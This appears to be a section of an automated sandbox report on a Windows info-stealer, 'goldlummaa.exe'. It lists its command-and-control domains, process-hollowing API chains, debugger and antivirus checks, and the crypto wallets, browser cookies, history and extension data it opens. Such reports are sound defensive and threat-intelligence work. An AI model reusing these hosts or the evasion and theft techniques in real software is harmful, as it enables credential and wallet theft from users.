                    Source: goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/al6
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1522003733.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api.
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/apiX
                    Source: goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/e
                    Source: goldlummaa.exe, 00000003.00000003.1576661897.00000000032E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/h
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/int16C
                    Source: goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/perati
                    Source: goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/pi
                    Source: goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/rs.
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/s
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/api
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49769 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49780 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49801 version: TLS 1.2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004310D0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D2F03_2_0043D2F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043C2803_2_0043C280
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004252BA3_2_004252BA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004043703_2_00404370
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041CB053_2_0041CB05
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00428BC03_2_00428BC0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004143C23_2_004143C2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00402BD03_2_00402BD0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00428BE93_2_00428BE9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004373993_2_00437399
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004393A03_2_004393A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00416BA53_2_00416BA5
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004293AA3_2_004293AA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00436C003_2_00436C00
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004234103_2_00423410
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00404CB03_2_00404CB0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004074B03_2_004074B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041DD503_2_0041DD50
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004185783_2_00418578
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042D57E3_2_0042D57E
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004245023_2_00424502
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00421D103_2_00421D10
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041D5E03_2_0041D5E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004175823_2_00417582
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D5803_2_0043D580
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00427DA23_2_00427DA2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004205B03_2_004205B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C64A3_2_0042C64A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00426E503_2_00426E50
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042B4F73_2_0042B4F7
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043462A3_2_0043462A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004356303_2_00435630
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004066E03_2_004066E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C6E43_2_0042C6E4
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00430EF03_2_00430EF0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004256F93_2_004256F9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00425E903_2_00425E90
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004156A03_2_004156A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041BEA03_2_0041BEA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00405EB03_2_00405EB0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00415F663_2_00415F66
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004197703_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004097003_2_00409700
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C7263_2_0042C726
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C7353_2_0042C735
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041DF803_2_0041DF80
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00402FA03_2_00402FA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C610003_2_00C61000
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C652353_2_00C65235
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C715423_2_00C71542
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: String function: 00C6970F appears 36 times
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: String function: 00407F70 appears 46 times
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: String function: 00C651F0 appears 64 times
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: String function: 00414060 appears 74 times
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                    Source: goldlummaa.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: goldlummaa.exe Static PE information: Section: .bss ZLIB complexity 1.0003260869565218
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/9@1/2
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7460
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\409fc4e0-0835-467c-b4d6-b1f0ab314623
                    Source: goldlummaa.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\goldlummaa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: goldlummaa.exe, 00000003.00000003.1433313990.0000000003278000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1433089677.0000000003294000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: goldlummaa.exe ReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\goldlummaa.exe File read: C:\Users\user\Desktop\goldlummaa.exe
                    Source: unknown Process created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: webio.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\goldlummaa.exe Section loaded: version.dll
                    Source: goldlummaa.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                    Source: goldlummaa.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: goldlummaa.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: goldlummaa.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: goldlummaa.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: goldlummaa.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: goldlummaa.exe Static PE information: section name: .OO
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C646A3 push ecx; ret 0_2_00C646B6
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00444520 push ebp; ret 3_2_00444522
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 3_2_0043BF01
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C646A3 push ecx; ret 3_2_00C646B6
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\goldlummaa.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exe TID: 7476Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BE9A FindFirstFileExW,0_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C6BF4B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BE9A FindFirstFileExW,3_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00C6BF4B
                    Source: C:\Users\user\Desktop\goldlummaa.exe API call chain: ExitProcess graph end node graph_3-21809
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_0043A9B0 LdrInitializeThunk, 3_2_0043A9B0
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C678CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C678CC
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C7A1A9 mov edi, dword ptr fs:[00000030h] 0_2_00C7A1A9
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C61770 mov edi, dword ptr fs:[00000030h] 0_2_00C61770
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C61770 mov edi, dword ptr fs:[00000030h] 3_2_00C61770
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C69726 GetProcessHeap, 0_2_00C69726
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C6501B SetUnhandledExceptionFilter, 0_2_00C6501B
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C65027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C65027
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C645B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00C645B7
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C678CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00C678CC
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C6501B SetUnhandledExceptionFilter, 3_2_00C6501B
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C65027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00C65027
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 3_2_00C645B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00C645B7

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C7A1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_00C7A1A9
                    Source: C:\Users\user\Desktop\goldlummaa.exe Memory written: C:\Users\user\Desktop\goldlummaa.exe base: 400000 value starts with: 4D5A
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: debonairnukk.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: diffuculttan.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: effecterectz.xyz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: deafeninggeh.biz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: immureprech.biz
                    Source: goldlummaa.exe, 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tacitglibbr.biz
                    Source: C:\Users\user\Desktop\goldlummaa.exe Process created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\goldlummaa.exe Code function: 0_2_00C648D3 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 0_2_00C648D3
                    Source: C:\Users\user\Desktop\goldlummaa.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe
                    Source: C:\Users\user\Desktop\goldlummaa.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR
                    Source: Yara match File source: 3.2.goldlummaa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.goldlummaa.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
